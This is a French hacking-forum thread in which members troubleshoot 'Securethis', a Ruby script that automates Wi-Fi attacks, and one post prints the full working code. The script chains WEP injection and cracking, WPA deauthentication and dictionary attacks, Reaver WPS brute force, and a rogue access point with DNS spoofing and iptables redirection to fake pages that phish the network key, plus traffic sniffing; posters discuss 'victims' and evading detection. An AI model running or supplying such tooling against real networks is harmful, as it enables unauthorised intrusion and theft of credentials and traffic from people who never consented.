Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 29-11-2013 19:20:08

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Fab955 a écrit :

Pour info la video de koala à été supprimée de daily.

Oui alors la je vais demander des explications a dailymotion car je vois pas en quoi cette vidéo était dérangeante, les tests que je fais sont toujours sur mon propre réseau (sfr) ou avec l'accord de mes potes donc je pars du principe qu'ils pourraient au moins m'avertir par mail et m'expliquer le pourquoi du comment avant de faire sauter la vidéo hmm

Dernière modification par koala (29-11-2013 19:21:20)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 30-11-2013 16:10:59

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Securethis V 1.0 script pour WEP/WPA

c'est rageant et pas très normal; ils pourraient par exemple arrêter de le diffuser mais au moins te permettre de le récupérer... et te dire le pourquoi ne serait pas mal.

Hors Ligne

#28 30-11-2013 18:09:08

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Oui, j'ai regardé dans mon ancienne boite mail et je me suis rendu compte que j'avais reçu un mail de leurs part comme quoi la vidéo n'était pas conforme a l'utilisation de leurs service... mouais... de toute manière j'en referai une autre quand j'aurais plus de temps mais sur youtube cette fois smile

Hors Ligne

#29 30-11-2013 18:45:46

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : Securethis V 1.0 script pour WEP/WPA

Les enfumiers! Bon es-ce que je peux configurer ça de la même manière que tu l'avais présenté koala dans ce topic?

http://www.crack-wifi.com/forum/topic-8 … tml#p63747

Merci

Hors Ligne

#30 30-11-2013 18:52:00

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

salut koala, j'ai une idée j'espere qu'elle ne sera pas bete, pourquoi ne pas integrer reaver dans ton srcypte en faisant référence au scrypte de notre ami kcdtv celui qui génére le code pin grace à un algo,
une autre question est ce que c'est possible dans une attaque rogue AP de lancer deux fois la commande airbase?
1 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -e #{$essid} mon0 &> /dev/null &")
2 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")

question 1
pourquoi t'as pas utiliser le canal -c dans la premiere airbase
question 2
la configuration du fichier dhcpd.con n'est pas programmée.
question 3
est ce que dans cette méthode "de votre scrypte" on utilise la connexion internet ou non ?
merci

Hors Ligne

#31 30-11-2013 20:30:23

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

@ Fab955


Oui tu peux du moment que ton dhcp.conf est paramétré et correspond aux règle iptables, dans l'autre sujet c'est le dhcp que j'utilise et j'ai pas changer depuis, donc ç'est bon.

@ FFOO31


Attention a la confusion, la il s'agit d'une des options de downgrade du réseau ciblé qui est censer faire apparaitre une croix rouge dans le réseau dans fil de la victime sous windows:

2 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")

Cette option je l'ai enlevé pour la remplacer par airdrop-ng mais tu peux aussi modifier la ligne pour remettre mdk3 si tu veux.

Il ne suffit que d'une seul commande pour lancer airbase wink qui est donc :

1 system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -e #{$essid} mon0 &> /dev/null &")

Le dhcpd.conf n'est pas programmé mais il y a plein d'exemple de fichier sur le forum, le mieux est que tu prenne celui du lien que donne Fab955.


Ton idée n'est pas bète mais après le code etre beaucoup plus long enfin j'y réfléchirai pour une futur mise a jour smile

Dernière modification par koala (30-11-2013 20:38:08)

Hors Ligne

#32 30-11-2013 20:37:10

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 706

Re : Securethis V 1.0 script pour WEP/WPA

Ok m'sieur merci. Je vais tester ça tout à l'heure. Je ferais un retour dire si j'ai réussi ou po à faire une rogue mad

Hors Ligne

#33 30-11-2013 20:41:16

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

merci koala, tu m'as pas répondu si ton rogue AP a besoin de la connexion internet
si forcement oui, y'a t'il une possibilté de mettre rogue AP avec une facke page sans utiliser la connexion internet
merci

Hors Ligne

#34 30-11-2013 20:43:56

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Oui une rogue AP avec internet n'est pas une obligation (c'est juste une option dans le script) la rogue sans internet c'est d'ailleurs le principe de base de la rogue AP cool

Hors Ligne

#35 30-11-2013 20:53:19

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

donc je profite de hummour aujourdhui, lol  je te prie de me donner une configuration sans utiliser l'internet pour que je puisse utiliser cette option,
parceque je n'ai jamais mettre en place un Rogue AP sans option internet, j'ai toujours faire appel au wlan1 et ip  qui nous donne wcid

Hors Ligne

#36 30-11-2013 20:56:25

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Et moi je vais profiter de ma chiantise big_smile mais tu devrais lire car sur cette page meme tu as la solution.


Ps: Pour une rogue AP plus discrète avec internet le mieux est hostapd, option disponible dans le script.

Hors Ligne

#37 30-11-2013 21:07:40

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

lol apparament le chaint c'est moi, et pour le rogue AP avec WKV, l'anti virus de la victime ne réagi pas ?

Hors Ligne

#38 30-11-2013 21:15:14

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Securethis V 1.0 script pour WEP/WPA

FFOO31 a écrit :

lol apparament le chaint c'est moi, et pour le rogue AP avec WKV, l'anti virus de la victime ne réagi pas ?


Pas l'antivirus mais le naviguateur ou les sessions en HTTPS seront difficiles voir indisponibles pour la victime dans certains cas, et si l'on passe prochainement en HSTPS alors là ca deviendra encore plus dur...


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#39 30-11-2013 21:22:26

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

donc si la victime ne fait pas appel à un site en HTTP, notre page piègée n'apparaitera pas ???:(

Hors Ligne

#40 02-12-2013 18:59:33

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

j'ai installé :
rubygems1.9.1 et libgtk2-ruby1.8 pour les autres mon BT5R3 me dit qu'ils existent déjà.
et j'ai lancé ça:

mini_Screenshot.png

1 - je voulais tester ce jolie travail mais :error
koala a dit:
"Ensuite on prend le code de install.rb qu'on copie dans un nouveau fichier nommé install.rb et on le lance:
ruby install.rb"

2- je ne sais pas ou trouver ce  code de install.rb pour creer un fichier nommé install.rb?
3- ou mettre ce fichier?

Hors Ligne

#41 02-12-2013 21:12:07

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Non t'inquiete pas tu a bien fais dans la dernière misa a jour tu n'a pas besoin de install.rb juste Securethis.rb.Pour le highline/import je me souviens avoir eu cette erreur au début aussi mais ça fait longtemps et je sais plus comment je l'ai résolu, je vais me renseigner.

Hors Ligne

#42 02-12-2013 21:29:43

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Autant pour moi ça vient d'un module supplémentaire que j'ai oublier de mentionner, essai:

sudo gem install highline

Le sudo n'ai pas obligatoire pour backtrack, si ça te renvoi des erreur renvoi le résultat de:

ruby -v

afin de savoir ta version exact.

Le script est a la base pour unbutu mais backtrack étant bien fichu il a déga les librairie de ruby sauf ça en dirait. RECTIFICATION ça fait longtemps que j'ai pas utiliser le script donc j'ai oublier les détails, en premier on installe le tout:  (pour unbutu et autre version, si vous utilisez bactrack ne lancez pas install.rb ni les autres commandes mais seulement le "sudo gem install highline".)

Pour unbutu et autres:

ruby
rubygems1.8
rubygems1.9.1
libgtk2-ruby1.8
sudo gem install highline

Ensuite on lance tel quel "ruby install.rb" disponible en première page de ce topic et ensuite le dernier script que j'ai posté dans ce sujet.Les commandes ci-dessus sont valable pour unbutu et autres versions de linux autre que bactrack

Tu fais bien de reporter l'erreur ça servira a d'autres d'autant plus que j'ai toutes les dépendance de ruby installer sur ma version d'unbutu ce qui fait que je me rend moins compte de ce qu'il faut avoir pour faire fonctionner le script correctement.

Si tu as d'autres erreur poste les ici mais normalement la c'est bon.

Dernière modification par koala (02-12-2013 21:40:39)

Hors Ligne

#43 03-12-2013 19:08:35

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

meric koala de ta patience tongue je vais appliquer à la lettre tes recommandations et je te ferrais signe dès possible

Hors Ligne

#44 03-12-2013 20:30:58

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

me voila apres l'aide de koala j'ai executé ça mais malheureusement voici

Screenshot-1.png


aidez moi pour tester le scrypte de koala

Hors Ligne

#45 03-12-2013 20:39:30

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Mmmh la j'avoue que je comprends pas trop, va falloir qiue je remette la main a la patte on dirait.

Hors Ligne

#46 03-12-2013 20:47:30

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

le probleme est dans le scrypte meme ou la configuration de BTR3?

Hors Ligne

#47 03-12-2013 21:03:13

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Le script marchant sur ma 12.04lts je pense que ça viens d'un problème entre les package de ruby, peut etre qu'avec rake... faut que je regarde ça de plus près.Il serait intéressant de voir si le bug persiste sur kali ou BT5.

Ps: je vais tester le script sur kali ce soir.

Dernière modification par koala (03-12-2013 21:11:29)

Hors Ligne

#48 03-12-2013 21:19:20

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

je t'attend parceque j'ai hate de tester ton travail

Hors Ligne

#49 03-12-2013 23:36:16

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Securethis V 1.0 script pour WEP/WPA

Alors test sous Kali en dual boot positif, j'ai direct lancer le script comme quelqu'un qu'il voulait l'utiliser sans se soucier du reste, voila le résultat:

49od.png

Un petit sudo gem install highline

zi4y.png

Et le script apparait smile ça me rassure car je ne voulais pas laisser un truc qui marche pas en rade.

Par contre si tu place pas le fichier dhcpd.conf et le dns.txt se trouvant dans ce topic ou il faut tu auras des erreurs...

Tu as les fakes page et tout en main pour réussir donc plus d'excuse maintenant ! smile

Ps: j'allai oublier, ce script et fait pour unbutu 12.04 et autres version récente de linux a la base donc si tu veux avoir une version du code qui marche pour le WEP sur kali prends ce code-ci:  (c'est le meme que l'autre, la seul différence réside dans le fait que sur bactrack il y a pas de bug "channel -1" donc il faut prendre ce code si vous utilisez kali)

#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: [url]http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm[/url]  and follow the instructions")
sleep 20

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
end

def sergio
puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to [url]https://code.google.com/p/sergio-proxy/[/url] special thanks to Antares145 and his tuto, can be found here: [url=http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/\)]http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/\")[/url]
sleep 40
system ("ifconfig")
     puts "Enter your ip adress"
ip=""
ip=gets.chomp
ip=ip

`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
Dir.chdir '/root/sergio/sergio-proxy'
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /root/rules.txt`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            " 
  
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:ReaverWPS, "Reaver.") { wps() }
      menu.choice(:Sniffing, "Utilisation de Sergio proxy.") { sergio() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }    
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end

Ce code et évidemment un freeware et chacun peux le modifier a ta sauce mais dans ce cas faite partager ici ! smile

Dernière modification par koala (03-12-2013 23:58:13)

Hors Ligne

#50 06-12-2013 20:21:21

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Securethis V 1.0 script pour WEP/WPA

dis moi koala, est ce que je ce srcypt peut s'executer en *.sh ?
parceque j'ai pas de chance avec ruby

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.032 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]